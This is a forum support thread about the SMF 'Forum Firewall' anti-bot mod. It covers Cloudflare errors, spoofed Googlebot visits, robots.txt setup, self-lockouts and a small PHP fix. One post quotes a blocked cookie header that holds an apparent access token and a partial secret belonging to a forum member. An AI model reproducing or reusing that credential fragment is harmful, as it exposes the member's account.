Maybe??? Looking at what you provided I am not sure if the mod in it's current form can help you.  To determine that "for starters" I will need:

1.  Exact time, hit frequency and duration of each botnet visit.
2.  User Agent for each attacker.
3.  Any other things each UA does.  A Cpanel visitor log would be nice.

I am interested in the attack and maybe the mod can stop it now.  Maybe it will need adjustments.  The adjustments are something I could do.

Title: Re: Forum Firewall
Post by: societyofrobots on December 09, 2011, 05:26:09 AM
A continuation from the discussion here (http://www.simplemachines.org/community/index.php?topic=391926.msg3225385#msg3225385).

I have v2.0.1 of the forum installed, and I'm using Cloudflare. Turning on Forum Firewall generates these errors:

Guest
   
December 07, 2011, 11:00:08 PM
2a89d5561f16e6374cd253a9d9544dba
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=115488: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
December 07, 2011, 10:59:44 PM
fa65a07efc9f5124ed892762bc648d24
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=331;area=statistics8: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
December 07, 2011, 10:58:28 PM
dff33f707642938eaa06e7ee048fe77d
Type of error: Undefined
http://www.mysite.com/myforum/index.php?topic=7286.08: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
December 07, 2011, 10:57:43 PM
053190f8935a35f19fd2ad8c541e13f7
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=115588: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28


This is a list of mods I have installed:
1. Forum Firewall 1.1.5
4. Login Security 1.0.2.2
5. SimpleAds 1.0.1
6. Aeva ~ Auto-Embed Video & Audio 7.2
10. CloudFlare 1.0
11. Buddy List Page 1.0
12. Bookmarks 2.3
13. Pm_Informer 3.0
14. httpBL 2.5.1 <- installed, but disabled as it isn't working with CloudFlare
15. Smart Pagination 0.8
17. NiceTooltips 1.8
20. AjaxChat Integration 3.2.2b
22. Separate Replies and Views Column 1.91
23. Activity in Profile 1.1
24. Stop Spammer 2.3.9
25. Bad Behavior mod 1.5.6
26. TopicStarter Mod 1.7
27. Permission for Website Url Of Users 1.4
28. Avatar Verification 1.4.3


The attached file shows my Forum Firewall Settings. The errors only appear if I check 'Enable Testing'.
Title: Re: Forum Firewall
Post by: butchs on December 09, 2011, 05:42:18 PM
I will look into it.

Did you notice that guests are viewing profiles of members?  Do you really want bots to evade their privacy?

The robots.tst test does nothing.  You need to make a valid robots.tst file and then reinstall the mod.  Search for HELP here for more info.
Title: Re: Forum Firewall
Post by: societyofrobots on December 10, 2011, 12:01:44 AM
Quote from: butchs on December 09, 2011, 05:42:18 PM
Did you notice that guests are viewing profiles of members?  Do you really want bots to evade their privacy?

The robots.tst test does nothing.  You need to make a valid robots.tst file and then reinstall the mod.  Search for HELP here for more info.
Thanks for catching this. I think these two issues are resolved now. (but not the HTTP_CF_CONNECTING_IP bug)
Title: Re: Forum Firewall
Post by: butchs on December 10, 2011, 08:06:10 AM
Just because you get a message in the error log it does not mean you found a bug.  The mod has nothing to do with permissions.  Chances are it is an XSS exploit attempt due to lack of guest access security.  I tried to repeat the url but my test server asks for a password.  I get no error.  Guests should be set to not to view others peoples profile in permissions.  FYI - I also tried it with guests allowed to view other peoples profiles and I do not get an error.

I recommend you look at member id 331 & 115488, make sure they are trusted.  Look at their image files and links.  Make sure they were not compromised.  Then change your ADMIN password.
Title: Re: Forum Firewall
Post by: societyofrobots on December 10, 2011, 09:42:29 AM
Quote from: butchs on December 10, 2011, 08:06:10 AM
Just because you get a message in the error log it does not mean you found a bug.
I meant to say 'issue' ;D

QuoteGuests should be set to not to view others peoples profile in permissions.
Yeap, I have disabled Guest permissions to view user profiles, but still get the error.

Quote
I recommend you look at member id 331 & 115488, make sure they are trusted.  Look at their image files and links.  Make sure they were not compromised.
331 is an account that hasn't been accessed since 2006 and only has 1 post. 115488 doesn't exist. My latest member is #12277.

QuoteThen change your ADMIN password.
done.

I re-enabled Forum Firewall for a few seconds, and the errors came in again (see below). Interestingly, the IP for the Guest does not resolve (see attached image). It's blank for every single error. What happens if Forum Firewall cannot resolve an IP? I've been seeing occasional unresolved IP's accessing my site for years . . . I just assumed the spammer had some way of masking his IP.
Guest
   
Today at 12:00:43 PM
6b27a7e95bf2d2172605b6e843db055c
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=36248: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
Today at 12:00:37 PM
decece01e9d6f62e915b2dc36a4f7b11
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=983;area=showposts8: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
Today at 12:00:22 PM
a247e3a5e4b4eabb316ad341f783ad3b
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=9748: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
Today at 12:00:20 PM
f1d8554430a1c43618390b6da668392c
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=5959;area=statistics8: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
Today at 11:42:09 AM
96dfa21db92b41b25a9987b15197d076
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=1671;area=statistics8: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
Today at 11:42:05 AM
c8d6873d4408c49083fc9f612ef83dd7
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=875;area=statistics8: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
Today at 11:41:53 AM
a15f5242f35b4e3b0a12615e7cf45eac
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=8758: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
Today at 11:41:50 AM
28d991a9b41f7a8aff943b12cd2e40ea
Type of error: Undefined
http://www.mysite.com/myforum/index.php?topic=13631.08: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
Today at 11:41:42 AM
f96c2d0e17542d89016a1cc77c0fe61e
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=8718: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
Today at 11:41:31 AM
0848c75e0947a877a6bf6822e3aade8b
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=87598: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Guest
   
Today at 11:41:28 AM
83cbb65cfa0efe00de855efeba70df78
Type of error: Undefined
http://www.mysite.com/myforum/index.php?action=profile;u=824;area=statistics8: Undefined index: HTTP_CF_CONNECTING_IPFile: /home/mys/public_html/myforum/Sources/Subs-ForumFirewall.php
Line: 28
Title: Re: Forum Firewall
Post by: butchs on December 10, 2011, 11:09:30 AM
Quote from: societyofrobots on December 10, 2011, 09:42:29 AM
331 is an account that hasn't been accessed since 2006 and only has 1 post. 115488 doesn't exist. My latest member is #12277.

Member 331 may be a problem I would delete it.

Quote from: societyofrobots on December 10, 2011, 09:42:29 AMI re-enabled Forum Firewall for a few seconds, and the errors came in again (see below).

That means the bot is still attacking you.

It would be nice if I could see the cpanel last 100 visitors log?  Can you save this for me.  I can give you an email to send it to.

The ip addresses should show up.  Try clicking on enable "Enable IP Validation" to stop ip spoofing.

I suspect it is a spoofed good search engine bot.  Here is how to stop it robots.tst (http://www.simplemachines.org/community/index.php?topic=417490.msg3111015;topicseen#msg3111015) (misspelled on purpose).

The bots still can bypass the CF proxy.  Here is how to set up bypass protection (http://www.simplemachines.org/community/index.php?topic=417490.msg3123695;topicseen#msg3123695).
Title: Re: Forum Firewall
Post by: keith021773 on December 10, 2011, 01:22:42 PM
This seems to be a great mod.   Thanks for this!

I installed this mod about a week ago and have been testing it ever since.   There is alot of info in the visitor log and before I turn this mod on for real, I would like to post a pic of my visitor log just so someone can look and tell me that what they see is normal.   LOL    I error on the side of safety.   :)     Pic posted below.

Thanks all!
Title: Re: Forum Firewall
Post by: keith021773 on December 10, 2011, 01:23:29 PM
This seems to be a great mod.   Thanks for this!

I installed this mod about a week ago and have been testing it ever since.   There is alot of info in the visitor log and before I turn this mod on for real, I would like to post a pic of my visitor log just so someone can look and tell me that what they see is normal.   LOL    I error on the side of safety.   :)     Pic posted below.

Thanks all!
Title: Re: Forum Firewall
Post by: butchs on December 10, 2011, 02:34:57 PM
Quote from: keith021773 on December 10, 2011, 01:22:42 PM
This seems to be a great mod.   Thanks for this!

I installed this mod about a week ago and have been testing it ever since.   There is alot of info in the visitor log and before I turn this mod on for real, I would like to post a pic of my visitor log just so someone can look and tell me that what they see is normal.   LOL    I error on the side of safety.   :)     Pic posted below.

Thanks all!

If you do not have a proxy like cloudflare disable bypass protection or you will block yourself.  Otherwise read this (http://www.simplemachines.org/community/index.php?topic=417490.msg3123695;topicseen#msg3123695) to fix things up.
Title: Re: Forum Firewall
Post by: keith021773 on December 10, 2011, 10:23:55 PM
Thanks Butchs.   I have been running it live for about 6 hrs now and the only one problem with one member.   Here is the header and reason.   What do you think it could be?

GET /index.php?type=rss;action=.xml HTTP/1.1 Apple-PubSub/65.28

Bad Cookie: &QUOT;ACCESS_TOKEN=AAACER49PZCP8BAMZZEHIYCXXPAWCKBASMIVPWZAT7JXVDZBKI1WUYF453XWAT5TMKBLJPMUTZAWZAWYGIJBSSGVIGGZBVBDCTY5POUALNXGZDZD&AMP;BASE_DOMAIN=DADDYPLACE.COM&AMP;EXPIRES=1323576000&AMP;SECRET=2CSSXIHESKKBVH30SA_CFW__&A
Title: Re: Forum Firewall
Post by: butchs on December 10, 2011, 10:38:02 PM
An access token (http://en.wikipedia.org/wiki/Access_token) contains the security information for a login session and identifies the user, the user's groups, and the user's privileges.  Not sure if it is good or bad. Nevertheless, that site should not use that name...  Looks ok at first glance but the token length seems a tad overkill...  That makes me suspicious.  Check it out and see if it is legit.  If you want to grant him access you will need to delete "base" from XSS.

This is why the mod is admin configurable.
Title: Re: Forum Firewall
Post by: keith021773 on December 10, 2011, 10:57:27 PM
He is legit.  He has been a member for along time..

I deleted that just like you said and I emailed him.   We will see.

Also, I appreciate you making this mod and I sincerely thank you for the quick responses and the time you take to help us.    Thanks!
Title: Re: Forum Firewall
Post by: societyofrobots on December 11, 2011, 01:09:22 AM
Quote from: butchs on December 10, 2011, 11:09:30 AM
It would be nice if I could see the cpanel last 100 visitors log?  Can you save this for me.  I can give you an email to send it to.
Ok, I have the logs saved. PM your addy . . .

QuoteThe ip addresses should show up.  Try clicking on enable "Enable IP Validation" to stop ip spoofing.
Tried that, but no change.

QuoteI suspect it is a spoofed good search engine bot.  Here is how to stop it robots.tst (http://www.simplemachines.org/community/index.php?topic=417490.msg3111015;topicseen#msg3111015) (misspelled on purpose).
I added it about 24 hours ago (assuming I did it right). No effect as of right now. Should there be something written in the box titled 'Robots.txt action's'? I uninstalled and reinstalled and nothing ever appears.

QuoteThe bots still can bypass the CF proxy.  Here is how to set up bypass protection (http://www.simplemachines.org/community/index.php?topic=417490.msg3123695;topicseen#msg3123695).
The only advantage to this is to prevent the bot from modifying admin level settings by blocking out non-admin IP's, right? I really don't trust my ISP nor CloudFlare so I'd rather not do this . . .
Title: Re: Forum Firewall
Post by: butchs on December 11, 2011, 08:26:40 AM
PM sent.
Title: Re: Forum Firewall
Post by: butchs on December 11, 2011, 11:23:14 AM
Quote from: societyofrobots on December 11, 2011, 01:09:22 AM
I added it about 24 hours ago (assuming I did it right). No effect as of right now. Should there be something written in the box titled 'Robots.txt action's'? I uninstalled and reinstalled and nothing ever appears.

Yes.  If you did it right the robots.tst action field will be populated.

With a robots file like this:
User-agent: *

Disallow: /smf/index.php?action=activate
Disallow: /smf/index.php?action=admin
Disallow: /smf/index.php?action=arcade
Disallow: /smf/index.php?action=calendar
Disallow: /smf/index.php?action=collapse
Disallow: /smf/index.php?action=coppermine
Disallow: /smf/index.php?action=deletemsg
Disallow: /smf/index.php?action=editpoll
Disallow: /smf/index.php?action=help
Disallow: /smf/index.php?action=helpadmin
Disallow: /smf/index.php?action=lock
Disallow: /smf/index.php?action=login
Disallow: /smf/index.php?action=logout
Disallow: /smf/index.php?action=markasread
Disallow: /smf/index.php?action=media
Disallow: /smf/index.php?action=mergetopics
Disallow: /smf/index.php?action=mlist
Disallow: /smf/index.php?action=modifykarma
Disallow: /smf/index.php?action=movetopic
Disallow: /smf/index.php?action=notify
Disallow: /smf/index.php?action=notifyboard
Disallow: /smf/index.php?action=pm
Disallow: /smf/index.php?action=post
Disallow: /smf/index.php?action=profile
Disallow: /smf/index.php?action=printpage
Disallow: /smf/index.php?action=recent
Disallow: /smf/index.php?action=register
Disallow: /smf/index.php?action=removetopic2
Disallow: /smf/index.php?action=reporttm
Disallow: /smf/index.php?wwwRedirect
Disallow: /smf/index.php?action=search
Disallow: /smf/index.php?action=sendtopic
Disallow: /smf/index.php?action=splittopics
Disallow: /smf/index.php?action=stats
Disallow: /smf/index.php?action=sticky
Disallow: /smf/index.php?action=trackip
Disallow: /smf/index.php?action=unread
Disallow: /smf/index.php?action=unreadreplies
Disallow: /smf/index.php?action=who

Disallow: /cgi-bin/
Disallow: /smf/coppermine_dir/
Disallow: /smf/Sources/
Disallow: /smf/Themes/

Disallow: /smf/*.msg

Crawl-delay: 5


'Robots.txt action's' will look something like this:
action=activate|action=admin|action=arcade|action=calendar|action=collapse|action=coppermine|action=deletemsg|action=editpoll|action=help|action=helpadmin|action=lock|action=login|action=logout|action=markasread|action=media|action=mergetopics|action=mlist|action=modifykarma|action=movetopic|action=notify|action=notifyboard|action=pm|action=post|action=profile|action=printpage|action=recent|action=register|action=removetopic2|action=reporttm|action=search|action=sendtopic|action=splittopics|action=stats|action=sticky|action=trackip|action=unread|action=unreadreplies|action=who
Title: Re: Forum Firewall
Post by: societyofrobots on December 12, 2011, 12:42:27 AM
Hi butchs

I manually added the code you sent into the 'Robots.txt actions' section, and not much later I got this in the Visitors log:
2175 66.249.71.195 2011-12-11 10:52:33 GET /~mys/myforum/index.php?action=profile;u=8795 HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!
2174 66.249.71.195 2011-12-11 10:51:35 GET /~mys/myforum/index.php?action=profile;u=875 HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!
2173 66.249.71.195 2011-12-11 10:51:22 GET /~mys/myforum/index.php?action=profile;u=2001 HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!
2172 66.249.71.195 2011-12-11 10:50:36 GET /~mys/myforum/index.php?action=profile;u=8759;area=statistics HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!
2171 66.249.71.195 2011-12-11 10:49:43 GET /~mys/myforum/index.php?action=profile;u=874;area=statistics HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!
2170 66.249.71.195 2011-12-11 10:49:38 GET /~mys/myforum/index.php?action=profile;u=908;area=showposts HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!
2169 66.249.71.195 2011-12-11 10:48:40 GET /~mys/myforum/index.php?action=profile;u=8759 HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!


The IP 66.249.71.195 belongs to Google, but not sure if it was spoofed or I'm accidentally blocking Google. My robots.txt file had been up for 2 days before I enabled Robots.txt Validation.

I *swear* I did my robots.txt file right . . . but Forum Firewall doesn't automatically load my robots.txt file during installation.

It's accessible as http://www.my site name here.com/robots.txt

This is exactly how it looks:

User-agent: *
Disallow: /robotforum/index.php?action=activate
Disallow: /robotforum/index.php?action=admin
Disallow: /robotforum/index.php?action=arcade
Disallow: /robotforum/index.php?action=calendar
Disallow: /robotforum/index.php?action=collapse
Disallow: /robotforum/index.php?action=deletemsg
Disallow: /robotforum/index.php?action=editpoll
Disallow: /robotforum/index.php?action=help
Disallow: /robotforum/index.php?action=helpadmin
Disallow: /robotforum/index.php?action=lock
Disallow: /robotforum/index.php?action=login
Disallow: /robotforum/index.php?action=logout
Disallow: /robotforum/index.php?action=markasread
Disallow: /robotforum/index.php?action=mergetopics
Disallow: /robotforum/index.php?action=mlist
Disallow: /robotforum/index.php?action=modifykarma
Disallow: /robotforum/index.php?action=movetopic
Disallow: /robotforum/index.php?action=notify
Disallow: /robotforum/index.php?action=notifyboard
Disallow: /robotforum/index.php?action=pm
Disallow: /robotforum/index.php?action=post
Disallow: /robotforum/index.php?action=profile
Disallow: /robotforum/index.php?action=register
Disallow: /robotforum/index.php?action=removetopic2
Disallow: /robotforum/index.php?action=reporttm
Disallow: /robotforum/index.php?action=search
Disallow: /robotforum/index.php?action=sendtopic
Disallow: /robotforum/index.php?action=splittopics
Disallow: /robotforum/index.php?action=stats
Disallow: /robotforum/index.php?action=sticky
Disallow: /robotforum/index.php?action=trackip
Disallow: /robotforum/index.php?action=unread
Disallow: /robotforum/index.php?action=unreadreplies
Disallow: /robotforum/index.php?action=who
Disallow: /robotforum/Themes/

Disallow: /robotforum/*.msg

Disallow: /uploads/


I also loaded two versions, one as robots.txt and the same as Robots.txt, just in case I got the caps wrong . . . but no luck . . .

What am I doing wrong?
Title: Re: Forum Firewall
Post by: butchs on December 12, 2011, 04:57:47 AM
Quote from: societyofrobots on December 12, 2011, 12:42:27 AM
The IP 66.249.71.195 belongs to Google, but not sure if it was spoofed or I'm accidentally blocking Google. My robots.txt file had been up for 2 days before I enabled Robots.txt Validation.
...
What am I doing wrong?

You did nothing wrong!  I looked at your robots file and it looks correct.  FYI - you should set a crawl rate.  As I saw in the files you sent me and it looked like you are being attacked by spoofed good bots.  The robots test was made specifically for that attack.  Leave it on and sit back and wait.

Good bots follow robots text, bad bots do not.  To check it out go to google webmasters (http://www.google.com/support/webmasters/) and test your robots file.  If should be ok so do not worry.  At worst you may have one or two good bot hits but after a few days the bad bot will go away, your bandwidth will drop and life on the internet will be so much better.
8)
Title: Re: Forum Firewall
Post by: [Lucien] on December 12, 2011, 07:46:03 AM
Looks like a great mod Butchs! But i tried to visit your site/forum i get this message:

HTTP Error 403 Forbidden

You don't have permission to access

/smf/index.php on this server.

Your computer may be infected with a virus or a trojan. The Firewall has determined that you: Un-approved Country: NL!

If you get this message in error, please contact the ADM1N and provide the date and time of this message.


And i don't have virus or trojan, and why is my country unapproved? :)
Title: Re: Forum Firewall
Post by: butchs on December 12, 2011, 06:34:07 PM
As one would guess, the reason I create these mods because the bots keep attacking me!  So I use this mod to block all countries but my native Country.  Less to worry about...

Quote from: societyofrobots on December 12, 2011, 12:42:27 AM
2175 66.249.71.195 2011-12-11 10:52:33 GET /~mys/myforum/index.php?action=profile;u=8795 HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!
2174 66.249.71.195 2011-12-11 10:51:35 GET /~mys/myforum/index.php?action=profile;u=875 HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!
2173 66.249.71.195 2011-12-11 10:51:22 GET /~mys/myforum/index.php?action=profile;u=2001 HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!
2172 66.249.71.195 2011-12-11 10:50:36 GET /~mys/myforum/index.php?action=profile;u=8759;area=statistics HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!
2171 66.249.71.195 2011-12-11 10:49:43 GET /~mys/myforum/index.php?action=profile;u=874;area=statistics HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!
2170 66.249.71.195 2011-12-11 10:49:38 GET /~mys/myforum/index.php?action=profile;u=908;area=showposts HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!
2169 66.249.71.195 2011-12-11 10:48:40 GET /~mys/myforum/index.php?action=profile;u=8759 HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Robot Attack!


Looks like VICTORY to me!
Title: Re: Forum Firewall
Post by: keith021773 on December 12, 2011, 09:34:21 PM
That bugs me though that they are acting like google bots.
Title: Re: Forum Firewall
Post by: butchs on December 15, 2011, 02:38:19 PM
Me too.   O:)  :P  ???  8)
Title: Re: Forum Firewall
Post by: Maxtor on December 16, 2011, 09:39:05 AM
a solution to this?

http://i42.tinypic.com/jtxj0l.png

http flood in forum. different ips, same request. can we block this?
Title: Re: Forum Firewall
Post by: butchs on December 16, 2011, 09:49:09 PM
I am not good at guessing.  I need more info...  Have you tried the mod?
Title: Re: Forum Firewall
Post by: league on December 20, 2011, 11:53:01 PM
i got a issue. when i added a new theme to 2.0.1 and reinstalled forum firewall, it now has coding on top of header area. any idea what went wrong?
tgis the coding:
/ ForumFirewall Start $txt['permissionname_forumfirewall_goodgroup'] = 'Forum Firewall Whitelist Group'; $txt['permissionhelp_forumfirewall_goodgroup'] = 'This option will make a member group exempt from the Forum Firewall bandwidth check. This group will not to be tested for Forum Firewall DOS attempts.'; // ForumFirewall End
Title: Re: Forum Firewall
Post by: butchs on December 21, 2011, 08:11:16 AM
Those files do not correlate to what I use.  Must be a type in the manual install in the new theme.
Title: Re: Forum Firewall
Post by: league on December 21, 2011, 08:52:35 AM
that is what i thought if i remove that new theme do you think that will clear that?
Title: Re: Forum Firewall
Post by: Kindred on December 21, 2011, 09:12:03 AM
it's not a theme problem....   what happened is that you or the system added the language strings after the closing ?> in the language file
(probably modifications.english.php)
Title: Re: Forum Firewall
Post by: league on December 21, 2011, 09:21:07 AM
Tried that, didnt help. hmmm  well played around and found it. the mod more spiders did that. so i removed it and all is fine. thank you for listening to me ramble on..lol :) have a great xmas everyone
Title: Re: Forum Firewall
Post by: poojim on December 24, 2011, 04:54:32 AM
May I know if it is possible that it prevent me from logging in to my own site when set wrong? I can't log in to my site right now and the only thing I know of is that I changed some of the setting of forum firewall. What's more strange is that I cant also log in with my other non-SMF sites which I think cannot be the causes since I never made any changes on them and I don't even logged in when the problem happened. Hope somebody can help. Thank you!
Title: Re: Forum Firewall
Post by: butchs on December 24, 2011, 08:10:18 AM
Here is a link:
Un-banning yourself (http://www.simplemachines.org/community/index.php?topic=417490.msg3139830;topicseen#msg3139830)
Title: Re: Forum Firewall
Post by: poojim on December 24, 2011, 10:53:40 PM
Quote from: butchs on December 24, 2011, 08:10:18 AM
Here is a link:
Un-banning yourself (http://www.simplemachines.org/community/index.php?topic=417490.msg3139830;topicseen#msg3139830)

I was able to log in to all the sites lately. I checked out the settings and it's at zero already. Thank you!
Title: Re: Forum Firewall
Post by: butchs on December 25, 2011, 10:44:12 AM
That means the mod is not banning anyone.  Test it by doing the following:

Uncheck:  "Block Violations"
Then check:  "Logging" and "HelpEnable Testing ".

Then watch the visitor log and make adjustments.
Title: Re: Forum Firewall
Post by: poojim on December 30, 2011, 06:18:33 AM
Quote from: butchs on December 25, 2011, 10:44:12 AM
That means the mod is not banning anyone.  Test it by doing the following:

Uncheck:  "Block Violations"
Then check:  "Logging" and "HelpEnable Testing ".

Then watch the visitor log and make adjustments.


thanks butchs
Title: Re: Forum Firewall
Post by: shubha on January 05, 2012, 07:49:47 AM
Hello ,


As you are able to see "hack themes","hack repeated".
Whats going on.................I win or loose.....
Title: Re: Forum Firewall
Post by: Storman™ on January 05, 2012, 09:21:13 AM
butchs will probably explain in detail what you are seeing but I can tell you that the 66.249.64.0/19 IP range is owned by Google so it looks like you are stopping Googlebot on those last three entries.  ;)
Title: Re: Forum Firewall
Post by: shubha on January 05, 2012, 09:57:10 AM
Wait. I am not try to stop Google bot or whatever .It is done by this mod. And you are able too see tbe "hack themes" or "hack repeated".What is that.
Title: Re: Forum Firewall
Post by: butchs on January 05, 2012, 06:48:57 PM
Quote from: shubha on January 05, 2012, 07:49:47 AM
Hello ,

As you are able to see "hack themes","hack repeated".
Whats going on.................I win or loose.....

Remove Themes/|from your injection list.  Your forum name should not be in the list.  You are blocking innocents.

Hack repeated is just the cache.

Then set up your robots text (search: DDOS HELP) in this thread to find detailed instructions on how to prevent google bot spoofing.
Title: Re: Forum Firewall
Post by: shubha on January 05, 2012, 11:37:28 PM
Quote from: butchs on January 05, 2012, 06:48:57 PM
Quote from: shubha on January 05, 2012, 07:49:47 AM
Hello ,

As you are able to see "hack themes","hack repeated".
Whats going on.................I win or loose.....

Remove Themes/|from your injection list.  Your forum name should not be in the list.  You are blocking innocents.

Hack repeated is just the cache.

Then set up your robots text (search: DDOS HELP) in this thread to find detailed instructions on how to prevent google bot spoofing.

Thanks. Today i get
(http://i43.tinypic.com/156wpro.jpg)

I have block these ip-address.
Everyday i am unable to open the site. Is there any particular solution. And i did not found DDOS HELP in search.
Thanks for help.
Title: Re: Forum Firewall
Post by: butchs on January 06, 2012, 05:09:37 AM
If you select the search above and keep it as search this topic and type DDOS Help you will get this link (http://www.simplemachines.org/community/index.php?topic=417490.msg3243702#msg3243702).

The blocks you show are good blocks 46.17.97.76 is trying to use a script to register to post spam on your site passwords and the other one is trying to hide its address.
Title: Re: Forum Firewall
Post by: baldur2630 on January 09, 2012, 11:50:10 AM
It's an answer to many of my problems BUT...

This is a clean, fresh, shiney new installation of SMF and of Forum Firewall, and I'm getting a LOT of these error messages in the error log

Quote[Sun Jan 08 20:55:44 2012] [error] [client 84.198.66.249] PHP Strict Standards:  Only variables should be passed by reference in /var/www/gmusic/Sources/Subs-ForumFirewallScan.php on line 50, referer: http://xxxxx.xxxx.xxxxxxx.com/index.php
Any ideas?
Title: Re: Forum Firewall
Post by: butchs on January 09, 2012, 07:26:35 PM
In the next version I will replace:

$extension = array_pop(explode('.', $filename));

With:
$ff_var = '';
$ff_var = explode('.',$filename);
$extension =array_pop($ff_var);


The above should fix your error.
:)
Title: Re: Forum Firewall
Post by: baldur2630 on January 09, 2012, 11:33:44 PM
If you tell me which file to edit, it might help. I find ff_firewall.pjp and /sources/ForumFirewall.php and /sources/ForumFirewall-Admin.php and I don't find the line in any of them!
Title: Re: Forum Firewall
Post by: butchs on January 10, 2012, 04:48:35 AM
The file that had the error "Sources/Subs-ForumFirewallScan.php"
Title: Re: Forum Firewall
Post by: baldur2630 on January 10, 2012, 10:01:13 AM
That seems to have done the trick. Thanks
Title: Re: Forum Firewall
Post by: xxrapxx on January 11, 2012, 02:32:38 PM
for ddos or botnet?
What is must that settings?
Title: Re: Forum Firewall
Post by: butchs on January 11, 2012, 06:30:46 PM
Search "DDOS HELP", look a few posts back (http://www.simplemachines.org/community/index.php?topic=417490.msg3243942#msg3243942).

This mod does not do botnet.  If you want true botnet then get a Cisco firewall and sign up for the botnet service.  Problem with that is it only warns you about hits on the botnet.  You have to manually shun each botnet ip to block it.

Or you can try Bad Behavior  (http://custom.simplemachines.org/mods/index.php?mod=2502)mod which does a good job against many users of the botnet.
Title: Re: Forum Firewall
Post by: pols1337 on February 10, 2012, 05:43:06 PM
Hi,

Forum Firewall seems like a great (and necessary!) plug-in for SMF.  Will you be updating it to SMF 2.0.2?
Title: Re: Forum Firewall
Post by: butchs on February 11, 2012, 11:33:19 AM
It works fine with SMF 2.0.2.  I saw no need to change the "package-info.xml" for such a minor edit.

Title: Re: Forum Firewall
Post by: pols1337 on February 11, 2012, 02:00:12 PM
Okay, just checking since on the SMF Mod Site it only shows Compatibility up to 2.0.1  :)
Title: Re: Forum Firewall
Post by: butchs on February 11, 2012, 04:03:40 PM
Ok, I fixed it.
Title: Re: Forum Firewall
Post by: pols1337 on February 11, 2012, 06:27:14 PM
Hi Butchs,

I installed Forum Firewall this afternoon, and perhaps I activated the wrong settings, but now I'm locked out of my own forum [universeofmen.com].  Help!  I can't even log-in or reach any of the admin pages.   

SMF 2.0.2 + Tiny Portal

see attachment

Joel / pols1337
Title: Re: Forum Firewall
Post by: T3CHN0 on February 11, 2012, 07:29:21 PM
Quote from: pols1337 on February 11, 2012, 06:27:14 PM
Hi Butchs,

I installed Forum Firewall this afternoon, and perhaps I activated the wrong settings, but now I'm locked out of my own forum [universeofmen.com].  Help!  I can't even log-in or reach any of the admin pages.   

SMF 2.0.2 + Tiny Portal

see attachment

Joel / pols1337
Few pages back have a read, you will need to make the edits your self with ftp, if you don't know what ftp is then best way would be to search youtube.
http://www.simplemachines.org/community/index.php?topic=417490.msg3168850#msg3168850
Title: Re: Forum Firewall
Post by: pols1337 on February 11, 2012, 07:40:46 PM
[Resolved] I feel so stupid  :(  Thanks for reminding me about the search function.  I was freaking out!   :o

Instead of FTP, I used the PHPAdmin function as Butchs explained in:

